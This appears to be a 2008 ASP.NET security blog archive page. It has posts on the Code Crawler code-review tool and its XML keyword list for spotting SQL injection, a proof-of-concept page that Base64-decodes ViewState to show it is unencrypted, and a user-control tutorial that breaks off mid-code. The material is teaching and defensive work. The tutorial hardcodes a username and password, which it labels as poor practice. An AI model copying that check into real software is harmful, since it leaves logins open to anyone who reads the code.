jump to navigation

Code Crawler Status and Help request June 21, 2008

Posted by nTze in : Code Crawler, Code Review, owasp.org , add a comment

Hello fellows,

as you know the CC development is still undergoing and most of the features listed in the SOC 2008 are working in a beta status which I'm very happy of.

Code Crawler XML/XSL engine has been coded and I really proud to announce that CC will support custom templates, which will let you build and customize the "look&feel" of your results set.

The structure of the template is quite easy, the xml ouput file is mainly composed of three elements. Threat,Description,Name.  I'm half way to release a WFA (Wait for Approval) official owasp template which will be release with CC itself.

As you also may know, the CC keypointers database is in XML format now, and that's why i need your help. The actual database lists around 239 potential keywords.

Here an example

   1: <KeyPointer>
   2:     <k_name>exec sp_executesql</k_name>
   3:     <k_level>3</k_level>
   4:     <k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
   5:     <link>http://www.owasp.org</link>
   6: </KeyPointer>
   7: <KeyPointer>
   8:     <k_name>delete from where</k_name>
   9:     <k_level>3</k_level>
  10:     <k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
  11:     <link>http://www.owasp.org</link>
  12: </KeyPointer>

As you can see the description tag of every items are pretty the same for most of the categories, and that's where help is needed. If you have some time to spend and want to get involved in the CC development, feel free to add/modify descriptions for keywords. All help will be high appreciated.

The actual database can be found at http://www.cyphersec.com/TestLab/CodeCrawlerDatabase.xml (102kb). Once again, feel free to submit changes and be sure to mail it back to tools@[idontwantspam]cyphersec.com.

Thanks.
A.

Ops we did it again. June 14, 2008

Posted by nTze in : .NET, My Life , 2comments

n715592277_500493_1764

We are out now with the updated version of Apogeo ASP.NET pocket, anyway I truly hope the Apogeos guys are pushing for my updated "about". It's going to be funny :)

So what's about the future?

"ASP.NET 3.5" is officialy my last "italian written" book,  as i said before, there's a new "big fat" book coming up for the next year so, more to come.

"Guarda mamma, senza mani!"

Code Crawler 2.1.2 May 26, 2008

Posted by nTze in : Code Crawler, Code Review, owasp.org , 2comments

 

Live from Code Crawler Development offices (lol) :

  1. Done: XML Database instead of SQL Server Express
  2. Alessio to implement OWASP Orizon Project
  3. Almost Done: Result XML/XSLT based
  4. Almost Done: Scanning Engine Option : Scan Visual Studio's Solution

roadmap

Hacking ViewState for Fun and Profit May 25, 2008

Posted by nTze in : .NET, CyberCrime, Hacking , add a comment

The View State object is stored in a single Base64-encoded string that looks like this:

   1: <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dDw3NDg2NTI5MDg7Oz4="/>

Becase this value isn't formatted as clear text, many ASP.NET programmers assume that their view state date is encrypted. A clever hacker could reverse-engineer this string and examine your view state data in a matter of seconds.

Here a POC that show how it can be done.

Filename: firenze.aspx.cs

   1: /// ########################################################################################################################
   2: /// Tool Name   : Firenze
   3: /// Author      : Alessio "nTze" Marziali
   4: /// Contact     : alessio@owasp.org
   5: /// Url:          http://www.cyphersec.com
   6: /// Note:         Microsoft ASP.NET is a powerfull web application framework available on the market.
   7: ///               It's being used in big enviroments to build robuts and scalable web applications.
   8: ///               Unfortunatelly, due to lack of skills, some so called ASP.NET developers are not investing time in security.
   9: ///               
  10: ///               ASP.NET Security is gettin more and more important due to the fact which it gives it's best on Large
  11: ///               Enterprise Web Application scenarios.
  12: ///               
  13: ///               This tool was born based on the idea to show how reading sensitive informations can be possible
  14: ///               on Web-Applications like E-Banks which are implementing ViewState Object.
  15: /// ########################################################################################################################
  16: using System;
  17: using System.Web;
  18: using System.Web.UI;
  19: using System.Web.UI.HtmlControls;
  20: using System.Web.UI.WebControls;
  21:  
  22: /// <summary>
  23: /// Hacking ViewState:
  24: /// Because isn’t formatted as clear text, many ASP.NET programmers assume that their
  25: /// view state data is encrypted. It isn’t. A clever hacker could reverse-engineer this string and examine
  26: /// your view state data in a matter of seconds (here how).
  27: /// </summary>
  28: public partial class _Default : System.Web.UI.Page 
  29: {
  30:     protected void Page_Load(object sender, EventArgs e)
  31:     {
  32:         Page.Title = "Firenze : ViewState automated hacking tool";
  33:         TextBox UITextBox = new TextBox();              // Create a TextBox Item
  34:         
  35:         // Set properties
  36:         UITextBox.TextMode = TextBoxMode.MultiLine;
  37:         UITextBox.Wrap = true;
  38:         UITextBox.Rows = 10;
  39:         UITextBox.Width = 300;
  40:         UITextBox.ID = "UIViewStateCode1";
  41:         UITextBox.CssClass = "viewStateBox"; 
  42:         UITextBox.Text = "ViewState Goes here";
  43:  
  44:         // Show through UIReader1 (PlaceHolder)
  45:         UIReader1.Controls.Add(UITextBox);
  46:  
  47:         // UIButton properties
  48:         UIButton1.Text = "Decode ViewState";
  49:         UIButton1.Width = UITextBox.Width;
  50: }
  51:  
  52:     /// <summary>
  53:     /// UIButton1_Click Event Handler
  54:     /// </summary>
  55:     /// <param name="sender">object</param>
  56:     /// <param name="e">EventArgs</param>
  57:     protected void UIButton1_Click(object sender, EventArgs e)
  58:     {
  59:         // Check if a TextBox Control exist within the page
  60:         TextBox RetriviedControl = null;
  61:         try 
  62:         {
  63:             RetriviedControl = (TextBox)Page.FindControl("UIViewStateCode1");
  64:             UILiteral.Text = ReadViewState(RetriviedControl.Text);
  65:         }
  66:         catch (NullReferenceException)
  67:         {
  68:             UILiteral.Text = "Can find textbox control, giving up..";
  69:         }
  70:     }
  71:     
  72:     /// <summary>
  73:     /// TheViewState contains the view state information.
  74:     /// Convert the Base64 string to an ordinary array of bytes
  75:     /// representing ASCII characters.
  76:     /// </summary>
  77:     /// <param name="TheViewState">System.String - ViewState</param>
  78:     /// <returns>System.String - Human readeable Code</returns>
  79:     protected internal string ReadViewState(string theViewState)
  80:     {
  81:         string decodedViewState = string.Empty;
  82:         try
  83:         {
  84:             byte[] stringBytes = Convert.FromBase64String(theViewState);                    // Create an Array of bytes       
  85:             decodedViewState = System.Text.Encoding.ASCII.GetString(stringBytes);           // Enconde 7bit set
  86:         }
  87:         catch (System.FormatException)
  88:         { 
  89:             return "Sorry, Looks like you were looking for something i can't read";
  90:         }
  91:         return decodedViewState;
  92:     }
  93: }

Filename: firenze.aspx

   1: <%@ Page Language="C#" AutoEventWireup="true"  EnableViewState="false" CodeFile="Default.aspx.cs" Inherits="_Default" %>
   2: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   3: <html xmlns="http://www.w3.org/1999/xhtml">
   4: <head runat="server">
   5: <link rel="Stylesheet" href="Css/StyleSheet.css" type="text/css" />
   6:     <title>Hacking My Own ViewState</title>
   7: </head>
   8: <body>
   9:     <form id="form1" runat="server">
  10:         <asp:PlaceHolder id="UIReader1" runat="server" /><br /><br />
  11:         <asp:Button ID="UIButton1" runat="server" onclick="UIButton1_Click" />
  12:         <br /><br />
  13:         <asp:Literal ID="UILiteral" runat="server" />
  14:     </form>
  15: </body>
  16: </html>

User Controls - The basics May 11, 2008

Posted by nTze in : .NET, Pro ASP.NET, riflessioni , add a comment

Sooner or later, you'll want to get under the hood, start tinkering, and build your very own user interface components.
In .NET, you can plug into the web forms frameworks with your own controls in two ways. You can develop either of the following:

Let's start with the User Controls and the basics.

User control, (.ascx) files are similiar to ASP.NET web-form files. Like web forms, user controls are composed of a user interface portion with control tags and can use inline script or a .cs code-behind file. User controls can contain just about anything a web page can, including static HTML content and ASP.NET controls, and they also receive the same events as the Page object (like Load and PreRender) and expose the same set of intrinsic ASP.NET objects through properties.

The key differences between user controls and web pages are as follows:

To create a user control in Visual Studio, select Website and than Add New Item, and choose the Web User Control template like showed in the image.

01_ChosetheTempalte

The following is the simplest login box user control possible.

   1: <%@ Control Language="C#" AutoEventWireup="true" CodeFile="UIWUserControl1.ascx.cs" Inherits="UIWUserControl1" %>
   2: <b>Hello and Welcome on WebSite1. Please log-in.</b>
   3: <table>
   4: <tr>
   5:     <td>Username</td>
   6:     <td><asp:TextBox ID="UIusername" runat="server" />
   7:         <asp:RequiredFieldValidator ID="RFValidator1" runat="server" 
   8:             ErrorMessage="Field is required" ValidationGroup="Validation1" ControlToValidate="UIusername"></asp:RequiredFieldValidator>
   9:             </td>
  10: </tr>
  11: <tr>
  12:     <td>Password</td>
  13:     <td><asp:TextBox ID="UIpassword" runat="server" />
  14:         <asp:RequiredFieldValidator ID="RFValidator2" runat="server" 
  15:             ErrorMessage="Field is required" ValidationGroup="Validation1" ControlToValidate="UIpassword"></asp:RequiredFieldValidator>
  16:             </td>
  17: </tr>
  18: <tr>
  19:     <td colspan="2"><asp:Button ID="UIbutton1" runat="server" Text="Log-in" 
  20:             onclick="UIbutton1_Click"/></td>
  21: </tr>
  22: </table>

As with ASP.NET web forms, the user control is a partial class, because it's merged with a separated portion generated by ASP.NET. That automatically generated portion has the member variables for all the controls you add at design time.

To test the control, you need to place it on a web form. First, you need to tell the ASP.NET page that you plan to use that user control with the Register directive, which you can place immediately after the Page directive, as shown here:

<%@ Register TagPrefix="UIAlessio" TagName="LoginBox" Src="UIWUserControl1.ascx" %>

Tis line identifies the source file that contains the user control using the Src attribute. It also defines a tag prefix and tag name that will be used to declare a new control on the page. In the same way that ASP.NET server controls have the <asp:..> prefix to declare the controls. You can use your own tag prefixes to help distinguish the controls you've created.

This example use a tag prefix of UIAlessio and a tag named LoginBox.

Here the full tag is shown in the page.

   1: <%@ Page Language="C#" AutoEventWireup="true"  CodeFile="Default.aspx.cs" Inherits="_Default" %>
   2: <%@ Register TagPrefix="UIAlessio" TagName="LoginBox" Src="UIWUserControl1.ascx" %>
   3: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   4: <html xmlns="http://www.w3.org/1999/xhtml">
   5: <head runat="server">
   6:     <title>WebSite1 (eek)</title>
   7: </head>
   8: <body>
   9:     <form id="form1" runat="server">
  10:     <div>
  11:         <UIAlessio:LoginBox id="UILoginBox" runat="server" />
  12:     </div>
  13:     </form>
  14: </body>
  15: </html>

Don't be worried to be lazy. Once yo've created your user control, simply selected the .ascx file in the Solution Explorer and drag it onto the design area of a web form. Visual Studio will automatically add the Register directive for you as well as an instance of the user control tag.

The login box didn't include any code. Instead, it simply provided a uself way to reuse a static block of a web-page user interface. In many cases, you'll want to add some code to your user control, either to handle events or to add functionality that the client can access. Just like a web form, you can add this code to the user control class in a <script> block directly in the .ascx file, or you can use a separated .cs code-behind file.

To get a better idea of how this works, the next example check how many times a user tried to log in without success. After 5 tries, it's fire up a mail using Gmail.

   1: public partial class UIWUserControl1 : System.Web.UI.UserControl
   2: {
   3:  
   4:     private Int16 m_FailedLogins = 0;
   5:     public Int16 FailedLogins
   6:     {
   7:         set { m_FailedLogins++; }
   8:         get { return m_FailedLogins; }
   9:     }
  10:  
  11:     /// <summary>
  12:     /// Send a Message to internal_ServiceManager@gmail.com
  13:     /// </summary>
  14:     private static void SendWarningEmail()
  15:     {
  16:         MailMessage msgMail = new MailMessage("myOwnedGmailAccount@gmail.com", "internal_ServiceManager@gmail.com");
  17:         SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
  18:         smtp.EnableSsl = true;
  19:         smtp.DeliveryMethod = SmtpDeliveryMethod.Network;
  20:         smtp.Credentials = new System.Net.NetworkCredential("username", "password");
  21:         msgMail.Body = "Warning Someones tried to login more than 5 times without success - Possible Brute Force attack";
  22:         try
  23:         {
  24:             smtp.Send(msgMail);
  25:         }
  26:         catch (Exception)
  27:         {
  28:             // put something here please
  29:         }
  30:     }
  31:  
  32:     protected void Page_Load(object sender, EventArgs e)
  33:     {
  34:  
  35:     }
  36:     protected void UIbutton1_Click(object sender, EventArgs e)
  37:     {
  38:         // Worst user validation ever
  39:         if ((UIusername.Text.Equals("Alessio")) && (UIpassword.Text.Equals("Marziali")))
  40:         {
  41:             return;
  42:         }
  43:         else